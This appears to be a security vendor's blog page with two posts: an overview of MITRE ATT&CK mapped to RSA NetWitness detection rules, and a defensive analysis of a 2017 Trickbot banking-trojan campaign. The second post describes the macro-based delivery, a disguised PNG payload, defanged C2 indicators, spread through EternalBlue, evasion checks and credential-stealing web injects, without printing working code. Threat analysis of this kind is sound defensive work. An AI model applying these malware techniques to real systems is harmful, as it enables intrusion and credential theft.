Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > Authors Prakhar Pandey

Introduction to MITRE’s ATT&CK™


Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) for enterprise is a framework which describes the adversarial actions or tactics from Initial Access (Exploit) to Command & Control (Maintain). ATT&CK™ Enterprise deals with the classification of post-compromise adversarial tactics and techniques against Windows™, Linux™ and MacOS™.


Consequently, two other frameworks are also developed namely, PRE-ATT&CK™ and ATT&CK Mobile Profile. PRE-ATT&CK™ is developed to categorize pre-compromise tactics, techniques and procedures (TTPs) independent of platform/OS. This framework categorizes the adversaries planning, information gathering, reconnaissance and setup before compromising the victim.


ATT&CK™ Mobile Profile is specific to Android and iOS mobile environments and has three matrices that classifies tactics and techniques. This does not just include post-compromise tactics and techniques but also deal with pre-compromise TTPs in mobile environments.


This community-enriched model adds techniques used to realize each tactic. These techniques are not exhaustive and the community adds them as they are observed and verified.


                This matrix is helpful in validation of defenses already in place and designing new security measures. It can be used in the following ways to improve and validate the defenses:


  1. This framework can be used to create adversary emulation plans which can be used by hunters and defenders to test and verify their defenses. Also, these plans will make sure you are testing against an ever-evolving industry standard framework.
  2. Adversary behavior can be mapped using ATT&CK™ matrix which can be used for analytics purposes to improve your Indicators of Compromise (IOCs) or Behavior of Compromise (BOCs). This will enhance your detection capabilities with greater insight into threat actor specific information.
  3. Mapping your existing defense with this matrix can give a visualization of tactics and techniques detected and thus can present an opportunity to assess gaps and prioritize your efforts to build new defenses.
  4. ATT&CK™ framework can help to build the threat intelligence with perspective of not just TTPs but threat groups and software that are being used. This approach will enhance your defenses in a way that detection will not be just dependent upon TTPs but the relationship it has with threat groups and software that are in play.


Relationships between Threat-Group, Software, Tactic and Techniques

Figure 1: Relationships between Threat-Group, Software, Tactics and Techniques


This framework resolves the following problems:


  1. Existing Kill Chain concepts were too abstract to relate new techniques with new types of detection capabilities and defenses. ATT&CK can be called a Kill Chain on steroids.
  2. Techniques added or considered should be observed in a real environment and not just from theoretical concepts. The community adding techniques insures that the techniques have been seen in the wild and thus are suitable for people using this model in real environments.
  3. This model gives common language and terminology across different environments and threat actors. This factor is important in making this model industry standard.
  4. Granular indicators like domain names, hashes, protocols et cetera do not provide enough information to see the bigger picture of how the threat actor is exploiting the system, and its relationship with various sub-systems and tools used by the adversary. This model gives a good understanding and relationship between tactics and techniques used which can be used further to drill down into only the important granular details.
  5. This model helps with making a common repository from where this information can be used with APIs and programming. This model is available via public TAXII 2.0 server and serve STIX 2.0 content.


ATT&CK Navigator


ATT&CK Navigator is a tool openly available through GitHub which uses the STIX 2.0 content to provide a layered visualization of ATT&CK model.


ATT&CK Navigator


Figure 2: ATT&CK Navigator


By default, this uses MITRE’s TAXII server but it can be changed to use any TAXII server of choice. Navigator uses JSON files to create layers which can be programmatically created and thus used to generate layers.


RSA NetWitness Event Stream Analysis (ESA)


ESA is one of the defense systems that is used to generate alerts. ESA Rules provide real-time, complex event processing of log, packet, and endpoint meta across sessions. ESA Rules can identify threats and risks by recognizing adversarial Tactics, Techniques and Procedures (TTPs).


The following are ESA Components:


  1. Alert - Output from a rule that matches data in the environment.
  2. Template - Convert the rule syntax into code (Esper) that ESA understands.
  3. Constituent Events - All of the events involved in an alert, including the trigger event.
  4. Rule Library - A list of all the ESA Rules that have been created.
  5. Deployments - A list of the ESA Rules that have been deployed to an ESA device.


The Rule Library contains all the ESA Rules and we can map these rules or detection capabilities to the tactics/techniques of ATT&CK matrix. The mapping shows how many tactics/techniques are detected by ESA. Please find attached with this blog post the excel workbook of mapping between ESA Rules and ATT&CK Tactics/Techniques.


In other words, overlap between ESA Rules and ATT&CK matrix can not only show us how far our detection capabilities reach across the matrix but also can quantify the evolution of product. We can measure how much we are improving and in which directions we are improving.


We have created a layer as a JSON file which has all the ESA Rules mapped to techniques. Then we have imported that layer on ATT&CK Navigator matrix to show the overlap. In the following image, we can see all the techniques highlighted that are detected by ESA Rules:


ATT&CK Navigator ESA Rules Mapping


Figure 3: ATT&CK Navigator Mapping to ESA Rules


To quantify how much ESA Rules spread across the matrix we can refer to the following plot:


ATT&CK Navigator ESA Rules Mapping Plot


                               Figure 4: Plot for ATT&CK Matrix Mapping to ESA Rules


Moving forward we can map our other detection capabilities with ATT&CK matrix. This will help to give us a consolidated picture of our complete defense system and thus we can quantify and monitor the evolution of our detection capabilities.










Thanks to Michael Sconzo and Raymond Carney for their valuable suggestions.

In first week of August 2017, malspam activity was observed delivering the Trickbot banking trojan, which has been heavily active this summer and has now once again evolved.


Beginning in 2011, Trickbot actors began targeting banks from countries like UK and India, but it has since expanded its range of countries and victims to include PayPal and Customer Relationship Management (CRM) providers. Trickbot has also consistently evolved, recently adding new evasion techniques, browser manipulation tools, modules targeting Microsoft Outlook data, and now worm functionality. 


Primary delivery of the malware has been attributed to the Necurs botnet and also sometimes RIG exploit kit. In the case of this most recent delivery, malspam delivered a MS Word document (File name: SecureMessage.doc) that contains embedded and obfuscated macros recorded in VBA along with a Santander bank decoy.



This document contains malicious VBA code and What's This File gives it a maximum threat score. The VBA code analysis shows main indicators as “VBA Code Contains Reference to Code Execution” and “VBA Code Contains Auto-Launch Scripts”.




As visible below, the cleansed VBA code contained within the document uses Shell to launch an executable.




Use of Chr in VBA code suggests possible obfuscation of specific strings:



Upon opening, the attachment attempts to download a PNG file (Filename: nologo.png) that is actually an executable and the TRICKBOT payload.  The first attempt to download our PNG file from lexpertpret[.]com  actually failed, but a second attempt out to hvsglobal[.]co[.]uk was successful in downloading and then saving to 'C:\Users\student\AppData\Local\Temp\ywbltmn.exe'.



NetWitness provides visibility and characterizes this activity as malicious into this through some of the more obvious meta tags, such as session.analysis = “first carve not dns”, service.analysis = “http no referer”, and file.analysis = “exe filetype but not exe extension”.




NetWitness Endpoint (aka ECAT) also easily detects this shady behavior.  For more details, please refer to FirstWatch's July 2017 work against Trickbot.


The malware’s configuration file carries Command and Control (C2) information as well as other module related settings.  In this case, version is 1000030, the group tag is ser801 and systeminfo & injectDll are the two modules the executable will attempt to download from any of the listed C2. 



Most of these C2 IPs are known to be associated with devices like Routers and IP Cameras [3].  For example, 84[.]238[.]198[.]166 from our config file appears to be a Router.



This version (1000029) of Trickbot also debuts worm-like capabilities to spread infections via the Eternal Blue exploit of CVE-2017-0144 in Server Message Block (SMB) protocol.   To do so, the malware attempts to get servers using NetServerEnum Windows API and then query LDAP to identify computers that are not domain controllers [1].  It is believed that these capabilities are in a testing phase and not yet fully implemented.


Image Source:


With regard to evasion, this new Trickbot codebase also demonstrates new capabilities [4].  Recent Trickbot versions contain blacklist checks for a variety of Defense/Research oriented DLLS, Processes, Filenames, Usernames, Window Names, and also checks if a Debugger is present.  On any positive hit, Trickbot exits and uninstall itself. 




Image Source:


The version 1000030 is also known to have two extra modules then previous versions of Trickbot [2]:

1. module.dll – Written in C++ and it steals information from browsers

2. outlook.dll – Written in Delphi and it steals Microsoft Outlook Data

Presence of Delphi can be assumed by analyzing the dropped EXE file through hybrid analysis:



Post infection, Trickbot uses both “Static Injection” (replace real bank login pages with rogue ones) and “Dynamic Injection” (redirect browsers to C2) to steal victim credentials.  Below is an example of a legitmate (left) and rogue page (right), where a Chrome icon indicates some elements in the page are not from secure sources [5]:



Trickbot banking trojan and the group responsible need to be studied with some periodicity, because this successor of Dyre has proven to be capable and ever evolving.  All relevant IOCs have been added to the FirstWatch C2 Domains and IPs feeds as available in RSA Live.


Thanks to Kevin Stear and Erik Heuser  for their contribution.















Filter Blog

By date: By tag: